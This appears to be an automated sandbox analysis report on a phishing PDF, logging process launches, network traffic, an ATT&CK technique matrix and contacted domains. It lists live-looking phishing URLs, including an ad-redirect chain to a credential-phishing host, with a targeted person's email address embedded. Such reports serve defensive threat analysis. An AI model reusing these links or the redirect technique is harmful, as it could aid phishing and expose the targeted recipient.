      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 104.125.88.106:443 -> 192.168.2.16:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.125.88.106:443 -> 192.168.2.16:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49752 version: TLS 1.2
      Source: classification engineClassification label: mal64.phis.winPDF@33/131@32/18
      Source: Saint Charles Borromeo Seminary-Wprckny.pdfInitial sample: https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edu##
      Source: Saint Charles Borromeo Seminary-Wprckny.pdfInitial sample: https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5btpas_id%5d?//telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edu##
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.4360Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-05-08 20-11-58-565.logJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Saint Charles Borromeo Seminary-Wprckny.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2160 --field-trial-handle=1628,i,15175157218959621648,12133064567235996358,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edu##
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1940,i,3111557400391393984,2327874427274712486,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edu##Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2160 --field-trial-handle=1628,i,15175157218959621648,12133064567235996358,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1940,i,3111557400391393984,2327874427274712486,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Google Drive.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: YouTube.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Sheets.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Gmail.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Slides.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Docs.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
      Source: Saint Charles Borromeo Seminary-Wprckny.pdfInitial sample: PDF keyword /JS count = 0
      Source: Saint Charles Borromeo Seminary-Wprckny.pdfInitial sample: PDF keyword /JavaScript count = 0
      Source: Saint Charles Borromeo Seminary-Wprckny.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure1
      Spearphishing Link
      Windows Management Instrumentation1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      3
      Masquerading
      OS Credential Dumping1
      Process Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS Memory1
      System Information Discovery
      Remote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://www.gstatic.c..?/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__.0%URL Reputationsafe
      https://chrome.cloudflare-dns.com0%URL Reputationsafe
      https://recaptcha.net0%URL Reputationsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/xynV5WTpq6pef300%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/12WoOwl2EBsyE56UvkVt2kJop490%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/efe0FwcSrW02P356lNUUbLQa82mn1000%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/0%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/89hjocAARSebIS27gFLCdefRWidDS8kUab760%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/klD379FF2GM6zPm33HgL5klVO4I4SQpHwx80Z7Yl1r1coRtBxGS3beU8781630%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket0%Avira URL Cloudsafe
      https://telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edu0%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/23FMnyUutKWXvsdabgp1irvw700%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/?jHmmclaughlin@scs.edu0%Avira URL Cloudsafe
      https://telefornication.com/favicon.ico0%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/favicon.ico0%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/wxFxGKaXJ1Sdy5frlO0QjLSY7SGnzx9ErsCrLXZu7niTdftqH1J4qdvt0jG901800%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/qzgXe6GTtpy9MQNktQ1m82zcabjeVXbE6XxvQzPom70%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/stJHdx5abCDRUWhdXjmVIv3zo2ry8Mmnl7DqPy6KQiYHAxqLL9JOrSrQVeGnjcq8gh2520%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/34XulaQandSR5aTPghBsor84ndx891030%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/zu1fyxZK9POg2bBgIN1dk26NB5O25su0%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/opbVIbbiIjSZq4kw2Hc7sTSmbHWJiruv16eLwu5PtXm7oiXGRy20hh485cd2400%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/ijFTkgLR5Efre1T29FYi4mZsJ0xy5FLOyx1t1pBM6XxEeSqEaWM6gGZRb122100%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/56GlYvF8v8vmR1Rn676aHEust550%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/rsU9Eqel6oXFg542R0Y7uK4Ff2sJKZkM88HuvPqoKUfUqAEELfv1t5GmNJ6cfSy4J0cd2000%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/rsDaFFHlAZCVklAUguHuyzvbqKJluv310%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/56AdOYKMMLgoJxyRlCwu189150%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/mnd5uDf70EKBz5cwqXlyQ3qijWRFcxrrFTVjS2781420%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/klU9KZQ56usLE89rVZhW6EvSGnlmL6U9fLwsF2zEvKwopEY9bQKaO7rWoafPGfbDjab2300%Avira URL Cloudsafe
      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/qrYOIGH4BKN8SNOJLeflWipzJBhyIs3HEHEROTD451400%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      ipapi.co
      172.67.69.226
      truefalse
        high
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          code.jquery.com
          151.101.66.137
          truefalse
            high
            d2vgu95hoyrpkh.cloudfront.net
            99.86.38.103
            truefalse
              high
              challenges.cloudflare.com
              104.17.2.184
              truefalse
                high
                0n18pyx-clickadservices-rebooot0fa.foeclec.com
                104.21.15.140
                truetrue
                  unknown
                  www.google.com
                  172.217.14.228
                  truefalse
                    high
                    telefornication.com
                    66.29.134.201
                    truefalse
                      unknown
                      httpbin.org
                      54.160.164.209
                      truefalse
                        high
                        cdn.socket.io
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://code.jquery.com/jquery-3.6.0.min.jsfalse
                            high
                            https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edufalse
                              high
                              https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/efe0FwcSrW02P356lNUUbLQa82mn100false
                              • Avira URL Cloud: safe
                              unknown
                              https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/xynV5WTpq6pef30false
                              • Avira URL Cloud: safe
                              unknown
                              https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/23FMnyUutKWXvsdabgp1irvw70false
                              • Avira URL Cloud: safe
                              unknown
                              https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/?jHmmclaughlin@scs.edufalse
                              • Avira URL Cloud: safe
                              unknown
                              https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/klD379FF2GM6zPm33HgL5klVO4I4SQpHwx80Z7Yl1r1coRtBxGS3beU878163false
                              • Avira URL Cloud: safe
                              unknown
                              https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/89hjocAARSebIS27gFLCdefRWidDS8kUab76false
                              • Avira URL Cloud: safe
                              unknown
                              https://www.google.com/recaptcha/api.jsfalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normalfalse
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                    high
                                    https://telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edu##false
                                      unknown
                                      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocketfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/#Hmmclaughlin@scs.edufalse
                                        unknown
                                        https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/12WoOwl2EBsyE56UvkVt2kJop49false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edufalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/favicon.icofalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://telefornication.com/favicon.icofalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=880b6b356a282766false
                                          high
                                          https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/zu1fyxZK9POg2bBgIN1dk26NB5O25sufalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/34XulaQandSR5aTPghBsor84ndx89103false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/opbVIbbiIjSZq4kw2Hc7sTSmbHWJiruv16eLwu5PtXm7oiXGRy20hh485cd240false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/qzgXe6GTtpy9MQNktQ1m82zcabjeVXbE6XxvQzPom7false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/wxFxGKaXJ1Sdy5frlO0QjLSY7SGnzx9ErsCrLXZu7niTdftqH1J4qdvt0jG90180false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/830379481:1715189460:4WJq2FlgaBnGPk-EL3xJ9pAJ6u5-Y1Cc3OADuoMfqYo/880b6b356a282766/84d6ba6304ae385false
                                            high
                                            https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/stJHdx5abCDRUWhdXjmVIv3zo2ry8Mmnl7DqPy6KQiYHAxqLL9JOrSrQVeGnjcq8gh252false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/56GlYvF8v8vmR1Rn676aHEust55false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://httpbin.org/ipfalse
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/880b6b356a282766/1715191956873/EUH-Q4aQROypa1lfalse
                                                high
                                                https://ipapi.co/81.181.60.92/json/false
                                                  high
                                                  https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/ijFTkgLR5Efre1T29FYi4mZsJ0xy5FLOyx1t1pBM6XxEeSqEaWM6gGZRb12210false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://cdn.socket.io/4.6.0/socket.io.min.jsfalse
                                                    high
                                                    https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/rsU9Eqel6oXFg542R0Y7uK4Ff2sJKZkM88HuvPqoKUfUqAEELfv1t5GmNJ6cfSy4J0cd200false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://a.nel.cloudflare.com/report/v4?s=xyBwLunhQ%2ByYlfUN34F22uFBH7Cd2HYf63gShBn2iZoqpSmykB7uA4XxYIwHAjOw7i2oAIT4%2BlHi8bSlPYjMFbcAk5PCyRFj%2FUEvwhhQjuBYmicNsxfv6HuIV%2BJeQQ%3D%3Dfalse
                                                      high
                                                      https://challenges.cloudflare.com/turnstile/v0/b/ce7818f50e39/api.jsfalse
                                                        high
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/880b6b356a282766/1715191956877/5f91988cb904a772a0d7013b0eebdf49616ba81fc4a186eda4e2c4c46e2c8d0b/vUcqapM6Nl_iDO3false
                                                          high
                                                          https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/rsDaFFHlAZCVklAUguHuyzvbqKJluv31false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/56AdOYKMMLgoJxyRlCwu18915false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://a.nel.cloudflare.com/report/v4?s=%2FzQrYwphdkQ9cRlxtCzeadwr8bJsrSW5JVzzaf%2Fj2CvBEQvx%2BPRky%2FVJ42nvfO54nnICGL9l21TisUaXQLbX%2Bv7EK%2FAnmEFTxrJcF2Cm4kSNFS%2FH5hHbHpaXQBDfvQ%3D%3Dfalse
                                                            high
